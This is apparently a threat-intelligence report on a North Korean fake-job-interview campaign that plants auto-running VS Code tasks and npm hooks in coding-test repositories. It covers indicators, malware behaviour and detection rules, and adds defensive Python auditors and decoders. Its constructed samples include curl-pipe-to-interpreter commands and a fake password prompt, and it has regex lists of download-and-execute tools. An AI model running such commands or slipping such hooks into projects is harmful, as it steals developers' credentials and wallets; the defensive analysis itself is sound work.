Lazarus Group "Fake Font" (Contagious Interview)

BLUF

North Korean state-sponsored actors (Lazarus Group, the "Contagious Interview" campaign) are targeting software engineers through fake job interviews. Trojanized coding-test repositories carry VS Code task files and npm install scripts disguised as web-font setup that deploy the BeaverTail stealer and the InvisibleFerret backdoor.

Executive Cost Summary

This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.

For organizations affected by Lazarus Group–style recruitment-based malware campaigns targeting software engineers and developer environments:

·       Low-end total cost: $450K – $1.1M

o   (single developer compromise, rapid containment, limited data exposure)

·       Typical expected range: $1.5M – $4.5M

o   (multiple endpoints affected, credential exposure, short operational disruption)

·       Upper-bound realistic scenarios: $6M – $12M

o   (credential reuse, cloud access abuse, crypto or IP loss)

Key Cost Drivers

·       Number of privileged developer accounts compromised

·       Scope of credential reuse across cloud, CI/CD, and SaaS platforms

·       Duration of attacker persistence prior to detection

·       Exposure of source code, proprietary algorithms, or cryptographic assets

·       Regulatory obligations triggered by employee or customer data access

Targeted Sectors

·       Technology

·       Software Engineering

·       Cryptocurrency

Countries Targeted

·       Global

Date of First Reported Activity

·       Late 2025

Date of Last Reported Activity Update

·       January 26–27, 2026

APT Names

·       Lazarus Group

o   DPRK-linked

Associated Criminal Organizations

·       Not applicable at this time

IOCs

Malicious Infrastructure & Domains

·       api.nvidia-release[.]org

·       npmjscloud[.]com

·       npmrepos[.]com

·       tradingprice[.]net

·       coingeckoprice[.]com

·       blocknovas[.]com (Front company)

Malicious Packages & Tools

NPM Packages

·       tailwindcss-forms-kit

PyPI Packages

·       Modified versions of pyperclip and pyrebase

Operational Characteristics

·       GitHub Repositories

o   17–19 repositories identified as of early 2026, typically presented as ordinary React or Node.js projects (coding tests or "take-home" assignments).

·       VS Code Tasks

o   Look for tasks in .vscode/tasks.json with "runOptions": {"runOn": "folderOpen"} whose command fetches and runs external shell commands or JavaScript (curl piped into node or bash, node -e, a hidden presentation). Such tasks only fire once the workspace is trusted, which is why the lure pushes the candidate to click "Trust".

·       Exfiltration

o   Data is frequently exfiltrated to Dropbox, Google Drive, Firebase, or Telegram.

Tools Used

·       Microsoft VS Code

·       GitHub

·       Node.js

CVEs

·       Not applicable at this time

Mitigation

·       Do not grant "Trust" to unfamiliar VS Code workspaces

o   VS Code opens unknown folders in Restricted Mode, where folderOpen tasks and workspace settings do not run; the lure depends on the victim clicking "Trust". Setting task.allowAutomaticTasks to off on developer machines removes the auto-run path entirely.

·       Vet package.json and .vscode/tasks.json before running anything

o   Read the npm lifecycle scripts (preinstall, install, postinstall, prepare) and any task with "runOn": "folderOpen". Install candidate test projects with npm install --ignore-scripts inside a disposable VM or container, never on a machine that holds production credentials, SSH keys, or wallets.
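The check above, as an added example (this is not code from the original page or from any vendor report): a small Python auditor that parses .vscode/tasks.json (JSONC, so comments and trailing commas are stripped first) and package.json, flags tasks that auto-run on folderOpen or whose command downloads and evaluates code, and flags npm lifecycle hooks that do the same. The sample files are constructed for illustration, and the risky-pattern list is a heuristic assumption rather than a campaign signature.

```python
import json
import re
from pathlib import Path

# Constructs that have no business in a task that fires when a folder is opened,
# or in an npm lifecycle hook: download-and-execute, inline interpreters, encoded blobs.
# Heuristic assumption, not a published indicator list.
RISKY = re.compile(
    r"(\bcurl\b|\bwget\b|invoke-webrequest|\biwr\b|\bnode\s+-e\b|\bpython3?\s+-c\b|"
    r"\beval\s*\(|base64|https?://|powershell|\bsh\s+-c\b)",
    re.IGNORECASE,
)
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")


def strip_jsonc(text):
    """tasks.json is JSONC: remove // and /* */ comments outside strings, then trailing commas."""
    def keep_strings(m):
        return m.group(0) if m.group(0).startswith('"') else ""
    text = re.sub(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/', keep_strings, text, flags=re.S)
    return re.sub(r",(\s*[}\]])", r"\1", text)


def task_command_line(task):
    """Flatten command + args, including the per-OS overrides VS Code allows."""
    parts = [task.get("command", "")] + list(task.get("args", []))
    for os_key in ("windows", "linux", "osx"):
        override = task.get(os_key) or {}
        parts += [override.get("command", "")] + list(override.get("args", []))
    return " ".join(str(p) for p in parts if p)


def audit_tasks_json(text):
    findings = []
    for task in json.loads(strip_jsonc(text)).get("tasks", []):
        cmd = task_command_line(task)
        auto_run = (task.get("runOptions") or {}).get("runOn") == "folderOpen"
        risky = bool(RISKY.search(cmd))
        if auto_run or risky:
            findings.append({"source": "tasks.json", "label": task.get("label", "<unnamed>"),
                             "auto_run": auto_run, "risky_command": risky, "command": cmd})
    return findings


def audit_package_json(text):
    findings = []
    scripts = json.loads(text).get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:          # these run on `npm install` without any user action
        cmd = scripts.get(hook, "")
        if cmd and RISKY.search(cmd):
            findings.append({"source": "package.json", "label": hook, "auto_run": True,
                             "risky_command": True, "command": cmd})
    return findings


def audit_repo(root):
    """Audit every .vscode/tasks.json and package.json under a checked-out repo (node_modules skipped)."""
    findings = []
    for path in Path(root).rglob("*"):
        if "node_modules" in path.parts or not path.is_file():
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        if path.name == "tasks.json" and path.parent.name == ".vscode":
            findings += audit_tasks_json(text)
        elif path.name == "package.json":
            findings += audit_package_json(text)
    return findings


# Constructed samples modelled on the lure described above; not real campaign artifacts.
SAMPLE_TASKS = r'''{
    // tasks.json allows comments and trailing commas, which plain json.loads rejects
    "version": "2.0.0",
    "tasks": [
        {
            "label": "Install required web fonts",
            "type": "shell",
            "command": "curl -s https://cdn.example.invalid/fonts.js | node",
            "runOptions": { "runOn": "folderOpen" },
            "presentation": { "reveal": "never" },
        },
        { "label": "build", "type": "npm", "script": "build" }
    ]
}'''
SAMPLE_PACKAGE = json.dumps({
    "name": "react-dashboard", "version": "1.0.0",
    "scripts": {"build": "vite build",
                "postinstall": "node -e \"require('https').get('https://cdn.example.invalid/init')\""},
})

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    results = audit_repo(target) if target else audit_tasks_json(SAMPLE_TASKS) + audit_package_json(SAMPLE_PACKAGE)
    for f in results:
        print(f"[{f['source']}] {f['label']}: auto_run={f['auto_run']} risky={f['risky_command']} :: {f['command']}")
```

Run it as `python audit_workspace.py path/to/cloned-repo` before opening the folder in VS Code; with no argument it audits the constructed samples. A finding with auto_run=True and risky_command=True is the exact shape of the "fake font" task: it executes the moment a trusted window opens and never shows a terminal.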

Malware Names

·       InvisibleFerret (Python backdoor)

·       MoonPeak (XenoRAT variant)

Malware Samples

InvisibleFerret

sha256

b4c0519e769d97db2ded3f8949f1189ccec85ac4caec87824246aa463fe54031

Malware Family

·       InvisibleFerret (often paired with the BeaverTail loader/stealer).

Known Decoding Key

·       Repeating-key XOR with a hardcoded key obfuscates exfiltrated files whose extensions do not match the malware's target list.
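An added example of the decoding step described above (not code from the original page or from the malware): repeating-key XOR is symmetric, so one routine both encodes and decodes, and because the key is fixed it can be recovered from a single obfuscated file whose first bytes are predictable (PNG/ZIP/PDF magic, a SQLite header). The key and the sample file below are constructed for the demonstration; the page states the real key is hardcoded but does not publish it.

```python
import itertools

# Assumed 4-byte key for the demonstration only; the campaign's hardcoded key is not on the page.
DEMO_KEY = bytes.fromhex("7a11d408")
PNG_SIGNATURE = bytes.fromhex("89504e470d0a1a0a")


def xor_with_key(data, key):
    """Repeating-key XOR. The scheme is symmetric: the same call encodes and decodes."""
    return bytes(b ^ k for b, k in zip(data, itertools.cycle(key)))


def recover_key(ciphertext, known_prefix, max_key_len=64):
    """Known-plaintext key recovery.
    XORing the ciphertext against the bytes the file is known to start with yields the keystream
    for those positions. The key is the shortest period of that keystream confirmed by at least
    one repeat, so the known prefix must be longer than the key; otherwise None is returned."""
    stream = bytes(c ^ p for c, p in zip(ciphertext, known_prefix))
    for key_len in range(1, min(max_key_len, len(stream) - 1) + 1):
        candidate = stream[:key_len]
        if all(stream[i] == candidate[i % key_len] for i in range(len(stream))):
            return candidate
    return None


def decode_exfiltrated_file(ciphertext, known_prefix):
    """Recover the key from the known header and return (key, decoded_file)."""
    key = recover_key(ciphertext, known_prefix)
    if key is None:
        raise ValueError("key is longer than the known prefix; supply more known plaintext")
    return key, xor_with_key(ciphertext, key)


# Constructed sample: an obfuscated PNG screenshot as it might sit in an exfil staging directory.
SAMPLE_PLAINTEXT = PNG_SIGNATURE + b"\x00\x00\x00\x0dIHDR constructed image body"
SAMPLE_CIPHERTEXT = xor_with_key(SAMPLE_PLAINTEXT, DEMO_KEY)

if __name__ == "__main__":
    key, plain = decode_exfiltrated_file(SAMPLE_CIPHERTEXT, PNG_SIGNATURE)
    print("recovered key:", key.hex(), "| header restored:", plain.startswith(PNG_SIGNATURE))
```

Once the key is known from one file it decodes every other artifact in the staging directory, which is usually faster than pulling the constant out of the obfuscated Python.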

Verdict

·       Malicious

o   Cross-platform Python-based backdoor/Remote Access Trojan

Primary Objectives

Data Exfiltration

·       Sensitive files

·       Browser credentials

·       Session cookies

Cryptocurrency Theft

·       Specifically targets 13+ types of crypto wallets (e.g., MetaMask) and password managers (e.g., 1Password).

Persistent Access

·       Establishes long-term control by downloading and executing remote desktop software like AnyDesk.

Behavior Analysis

Initial Access

·       Deployed as a second-stage payload by BeaverTail after victims are lured via fake job recruitment on LinkedIn or freelance sites.

Modular Architecture

·       Consists of four primary Python modules: main (host fingerprinting), payload (remote control), browser (credential and wallet theft), and AnyDesk (persistent remote access).

Capabilities

·       Includes keylogging

·       Clipboard monitoring

·       Geolocation tracking

·       Automated fingerprinting.

Exfiltration Channels

·       FTP uploads

·       Encrypted connections to the C2

·       The Telegram Bot API (sendDocument) for stolen files

Execution

·       Often triggered through malicious coding challenges, trojanized GitHub repositories, or abusing VS Code task automation (tasks.json)

Malware Samples

MoonPeak (XenoRAT variant)

sha256

847b4ad90b1daba2d9117a8e05776f3f902dda593fb1252289538acf476c4268

Malware Family

·       XenoRAT (customized variant)

Known Decoding Key

·       The AES-256 key is the SHA-256 hash of the server-side password, with an all-zero IV. The default password is 1234, so traffic from unconfigured builds decrypts with SHA256("1234").

Verdict

·       Malicious

o   High-priority Remote Access Trojan (RAT).

Primary Objectives

·       Data Exfiltration

o   Stealing sensitive information from compromised hosts.

·       Establishment of Persistence

o   Maintaining long-term access to target infrastructure.

·       Foreign Currency Gain

o   Recent 2026 activities specifically target South Korean investors for financial profit.

·       Infrastructure Shift

o   Transitioned from using public cloud services (Dropbox, Google Drive) to attacker-owned private C2 servers to avoid provider-led shutdowns.

Behavior Analysis

·       Asynchronous Execution

o   Asynchronous methods compiled into C# state machines spread each routine across MoveNext calls, complicating decompilation and disrupting linear analysis.

·       Capabilities

o   Inherits XenoRAT features including keylogging, UAC bypass, Hidden Virtual Network Computing (HVNC), and plugin loading.

·       Evasion Techniques

o   Employs LZNT1 compression and AES encryption for C2 traffic, and increasingly introduces new obfuscation layers with each variant.

·       Living off the Land

o   Often uses legitimate system utilities like powershell.exe for execution and persistence.
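An added example covering the "Known Decoding Key" entry (SHA-256 of the password as AES key, zero IV, default 1234) and the LZNT1-plus-AES C2 encoding in the "Evasion Techniques" bullet. This is not code from the original page or from the malware. It derives the key, decrypts with AES-256-CBC (the cryptography package is needed for that step only), and decompresses the result with a pure-Python LZNT1 decoder. Assumption: the page does not describe MoonPeak's message framing, so the decrypt helper treats a captured buffer as one PKCS#7-padded CBC message whose body is an LZNT1 stream; adjust the framing for real captures. The LZNT1 sample buffers are constructed by hand.

```python
import hashlib

ZERO_IV = bytes(16)


def derive_key(password):
    """XenoRAT/MoonPeak key schedule as described above: AES-256 key = SHA-256(password)."""
    return hashlib.sha256(password.encode("utf-8")).digest()


def lznt1_decompress(data):
    """Decompress an LZNT1 stream (MS-XCA): chunks with a 2-byte header whose low 12 bits are
    (compressed size - 1), bits 12-14 the signature 3, and bit 15 the compressed flag.
    A zero header ends the stream; a stored chunk is copied verbatim."""
    out = bytearray()
    pos = 0
    while pos + 2 <= len(data):
        header = int.from_bytes(data[pos:pos + 2], "little")
        pos += 2
        if header == 0:
            break
        size = (header & 0x0FFF) + 1
        chunk = data[pos:pos + size]
        pos += size
        out += _decompress_chunk(chunk) if header & 0x8000 else chunk
    return bytes(out)


def _decompress_chunk(chunk):
    """Inside a compressed chunk a flag byte precedes every 8 tokens: a clear bit is one literal
    byte, a set bit a 16-bit back-reference whose displacement/length split widens as output grows."""
    out = bytearray()
    i = 0
    while i < len(chunk):
        flags = chunk[i]
        i += 1
        for bit in range(8):
            if i >= len(chunk):
                break
            if not (flags >> bit) & 1:
                out.append(chunk[i])
                i += 1
                continue
            token = int.from_bytes(chunk[i:i + 2], "little")
            i += 2
            p, len_mask, disp_shift = len(out) - 1, 0x0FFF, 12
            while p >= 0x10:              # more output so far -> more bits for the displacement
                len_mask >>= 1
                disp_shift -= 1
                p >>= 1
            length = (token & len_mask) + 3
            start = len(out) - ((token >> disp_shift) + 1)
            if start < 0:
                raise ValueError("back-reference before start of chunk (corrupt stream)")
            for k in range(length):       # byte-wise copy so overlapping references act as run-length
                out.append(out[start + k])
    return bytes(out)


def aes_cbc_zero_iv_decrypt(ciphertext, key):
    """AES-256-CBC, all-zero IV, PKCS#7 padding. Raises ValueError on bad padding."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    decryptor = Cipher(algorithms.AES(key), modes.CBC(ZERO_IV)).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return unpadder.update(padded) + unpadder.finalize()


def decode_c2_message(ciphertext, candidate_passwords=("1234",)):
    """Try the default password first. A wrong key almost always fails PKCS#7 unpadding, so that
    check doubles as a password test. Returns (password, decompressed_plaintext)."""
    for pw in candidate_passwords:
        try:
            compressed = aes_cbc_zero_iv_decrypt(ciphertext, derive_key(pw))
        except ValueError:
            continue
        return pw, lznt1_decompress(compressed)
    raise ValueError("no candidate password produced valid padding")


# Constructed LZNT1 samples: a stored 4-byte chunk, then a compressed chunk holding three
# literals 'A','B','C' and one back-reference (displacement 3, length 9).
STORED_CHUNK = bytes.fromhex("0330") + b"ABCD"
COMPRESSED_CHUNK = bytes.fromhex("05b0" "08" "414243" "0620")

if __name__ == "__main__":
    print("default key:", derive_key("1234").hex())
    print(lznt1_decompress(STORED_CHUNK + COMPRESSED_CHUNK + b"\x00\x00"))
```

The decompressor is the part worth keeping: the same LZNT1 format shows up in NTFS compressed files and Windows hibernation data, so the decoder doubles as a general forensic utility.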

TTPs

Initial Access

·       T1566.003 Phishing: Spearphishing via Service

o   Threat actors pose as recruiters on platforms like LinkedIn or X to contact targets.

·       T1189 Drive-by Compromise

o   Victims are directed to fake interview websites or malicious GitHub repositories.

Execution

·       T1204.002 User Execution: Malicious File

o   Victims are tricked into downloading and running a "coding task" or a "fake font" installer.

·       T1059.007 Command and Scripting Interpreter: JavaScript

o   The campaign uses JavaScript-based malware (e.g., BeaverTail) often hidden in npm install scripts or fake font files.

·       T1053 Scheduled Task/Job

o   Abuses VS Code's task automation ("runOn": "folderOpen" in .vscode/tasks.json) to execute malware disguised as a web-font setup step. ATT&CK has no sub-technique for editor tasks (T1053.003 is Cron), so map to the parent technique.

Persistence

·       T1547 Boot or Logon Autostart Execution

o   Malware such as InvisibleFerret is configured to run persistently on the system.

·       T1133 External Remote Services

o   The InvisibleFerret Python backdoor provides long-term remote access.

Evasion

·       T1036 Masquerading

o   Malware is delivered disguised as legitimate software drivers, video call applications, or web fonts.

·       T1027.010 Obfuscated Files or Information: Command Obfuscation

o   JavaScript code is obfuscated using Base64 and variable substitutions.

·       T1562.001 Impair Defenses: Disable or Modify Tools

o   Actors convince victims to disable Docker or other container environments to bypass isolation.

Discovery

·       T1082 System Information Discovery

o   The GolangGhost backdoor and InvisibleFerret collect detailed host and system information.

·       T1083 File and Directory Discovery

o   The ss_ufind command in InvisibleFerret searches for files matching name patterns supplied by the operator.

Credential Access

·       T1555 Credentials from Password Stores

o   BeaverTail specifically targets browser-stored credentials and credit card information.

·       T1539 Steal Web Session Cookie

o   Used by the BeaverTail infostealer to hijack sessions.

Collection & Exfiltration

·       T1657 Financial Theft

o   The primary goal is exfiltrating private keys and seed data from over 13 different cryptocurrency wallets (e.g., Exodus, Binance).

·       T1070.004 Indicator Removal: File Deletion

o   Malware is configured to delete archives used for collection after successful exfiltration.

·       T1041 Exfiltration Over C2 Channel

o   Data is exfiltrated to attacker-controlled infrastructure or third-party services like Dropbox.

Suggested Rules / potential hunts

As a reminder, these are indicator rules and are likely to be noisy.

For best results, build a data model and review the matches as a report rather than alerting on each hit directly.

Suricata

·       Detect BeaverTail-style HTTP POST check-ins carrying a base64 blob in the request body. The body pattern alone will match unrelated traffic, so pair this with DNS or TLS SNI rules for the IOC domains listed above; the rule uses a local SID range rather than the Emerging Threats range.

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"LOCAL MALWARE Lazarus Contagious Interview/BeaverTail C2 check-in"; flow:established,to_server; content:"POST"; http_method; content:"/check"; http_uri; pcre:"/data=[A-Za-z0-9+\/]{32,}={0,2}/P"; classtype:trojan-activity; sid:1000001; rev:2;)

SentinelOne

·       Search for curl or PowerShell processes launched from a browser (Chrome, Edge, Safari) that immediately pipe into an interpreter. On macOS the parent process names are "Google Chrome" and "Safari", not the Windows image names.

Process.Parent.Name in ("chrome.exe", "msedge.exe", "Google Chrome", "Safari") AND (Process.CommandLine contains "curl" OR Process.CommandLine contains "Invoke-WebRequest") AND (Process.CommandLine contains "bash" OR Process.CommandLine contains "python" OR Process.CommandLine contains "node")

·       Suspicious Python/Node.js child processes that reference network resources on the command line (noisy on developer hosts; baseline per team before alerting)

Process.Name in ("python", "python3", "node") AND (Process.CommandLine contains "http" OR Process.CommandLine contains "socket")

Splunk

·       Hunt for npm/pip package installation out of download or temp directories (the working directory is the better signal; compare against the project roots your developers normally use)

index=sysmon EventCode=1 (CommandLine="*npm install*" OR CommandLine="*pip install*") AND (CommandLine="*temp*" OR CommandLine="*Downloads*" OR CurrentDirectory="*Downloads*" OR CurrentDirectory="*temp*")

·       Detect scripts that spawn fake OS-level password prompts (FROSTYFERRET-style). This is macOS behaviour: osascript never appears in Windows Sysmon logs, so run the search against the macOS endpoint process telemetry you collect and map the Sysmon-style field names below to that source's schema.

index=* ParentImage="*python*" Image="*osascript*" (CommandLine="*with prompt*" OR CommandLine="*with hidden answer*")
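The three endpoint hunts above, as an added example that runs the same logic over constructed process-creation events (this is not code from the original page or from any EDR vendor). It normalizes Windows and macOS image paths to a basename, so the browser-parent check works for both chrome.exe and "Google Chrome", and it ties the fake-password-prompt hunt to macOS events only, which is the correction the Splunk search needed. The field layout and the sample events are assumptions for illustration; map them to your own telemetry schema.

```python
import re

# Browser process names a recruiter-lure chain starts from: Windows image names and macOS names.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "google chrome", "safari", "firefox"}
# Download tool piped straight into an interpreter (the "paste this fix" ClickFix pattern).
DOWNLOAD_AND_RUN = re.compile(
    r"\b(curl|wget|iwr|invoke-webrequest)\b.*\|\s*(bash|sh|zsh|python3?|node)\b", re.I)
PKG_INSTALL = re.compile(r"\b(npm|pnpm|yarn)\s+(install|i|add)\b|\bpip3?\s+install\b", re.I)
UNTRUSTED_DIRS = re.compile(r"downloads|\\temp\\|/tmp/|/private/var/folders/", re.I)
# FROSTYFERRET-style credential prompt: an AppleScript dialog with a hidden answer field.
FAKE_PROMPT = re.compile(r"display dialog|with prompt|with hidden answer", re.I)


def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def hunt(events):
    """Run the three hunts over normalized process-creation events.
    Each event: {"id", "os", "image", "parent_image", "cmdline", "cwd"} (assumed layout).
    Returns (hunt name, event id) pairs in event order."""
    hits = []
    for ev in events:
        image = _basename(ev["image"])
        parent = _basename(ev.get("parent_image", ""))
        cmdline = ev.get("cmdline", "")
        if parent in BROWSERS and DOWNLOAD_AND_RUN.search(cmdline):
            hits.append(("browser_spawned_download_and_run", ev["id"]))
        if PKG_INSTALL.search(cmdline) and UNTRUSTED_DIRS.search(cmdline + " " + ev.get("cwd", "")):
            hits.append(("package_install_from_untrusted_dir", ev["id"]))
        if (ev.get("os") == "macos" and image == "osascript"
                and parent.startswith("python") and FAKE_PROMPT.search(cmdline)):
            hits.append(("python_spawned_fake_password_prompt", ev["id"]))
    return hits


# Constructed events (not real telemetry): three that should fire, three benign look-alikes.
SAMPLE_EVENTS = [
    {"id": "e1", "os": "windows", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "cmd /c curl -s http://update.example.invalid/fix.py | python -", "cwd": r"C:\Users\dev"},
    {"id": "e2", "os": "macos", "image": "/usr/bin/osascript", "parent_image": "/usr/bin/python3",
     "cmdline": "osascript -e 'display dialog \"Camera access requires your password\" default answer \"\" with hidden answer'",
     "cwd": "/Users/dev"},
    {"id": "e3", "os": "windows", "image": r"C:\Program Files\nodejs\node.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "cmdline": "npm install",
     "cwd": r"C:\Users\dev\Downloads\react-dashboard-test"},
    {"id": "e4", "os": "windows", "image": r"C:\Program Files\nodejs\node.exe",
     "parent_image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "cmdline": "npm install", "cwd": r"C:\src\internal-app"},
    {"id": "e5", "os": "macos", "image": "/usr/bin/osascript", "parent_image": "/bin/zsh",
     "cmdline": "osascript -e 'display notification \"build done\"'", "cwd": "/Users/dev/src"},
    {"id": "e6", "os": "macos", "image": "/usr/bin/curl",
     "parent_image": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome",
     "cmdline": "curl -O https://example.invalid/assessment.zip", "cwd": "/Users/dev/Downloads"},
]

if __name__ == "__main__":
    for name, event_id in hunt(SAMPLE_EVENTS):
        print(f"{name}: {event_id}")
```

Event e6 (a browser-spawned curl that only downloads) and e4 (npm install from a normal source tree) are left alone on purpose: the download-to-interpreter pipe and the untrusted working directory are what separate the lure from everyday developer activity.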


Delivery Method

·       Social engineering via fake job interviews and GitHub repository invitations.

Email sample

While the exact text varies by target, the following components are standard in these recruitment-themed lures:

Subject Lines

·       "Invitation to Technical Assessment: [Job Title]"

·       "Action Required: Software Developer Interview Tasks"

·       "Interview Follow-up: Troubleshooting Your Video Connection"

The "Fake Font" Lure

During a staged video call or technical test:

·       The attacker claims the candidate cannot see a specific document or coding environment because a required font is missing.

·       They then send an email or link to download a "font installer" (e.g., safarifontagent or a .dmg/.exe file) which is actually BeaverTail or InvisibleFerret.

The "ClickFix" Variation (2025-2026)

·       A common 2026 evolution is an email claiming a technical error occurred during the interview (e.g., "Your camera/microphone is not working").

·       The email directs the victim to a "support" page (like blockchainjobhub[.]com) that instructs them to copy and paste a "fix" command into their terminal, which installs the backdoor.

References

Open Source Malware

·       hxxps://opensourcemalware.com/blog/contagious-code-fake-font

GB Hackers

·       hxxps://gbhackers.com/dprk-interview-campaign/

Fireblocks

·       hxxps://www.fireblocks.com/blog/contagious-interview-recruiting-scam

Sekoia.io blog

·       hxxps://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/

Any.run

·       hxxps://any.run/cybersecurity-blog/lazarus-group-attacks-2025/
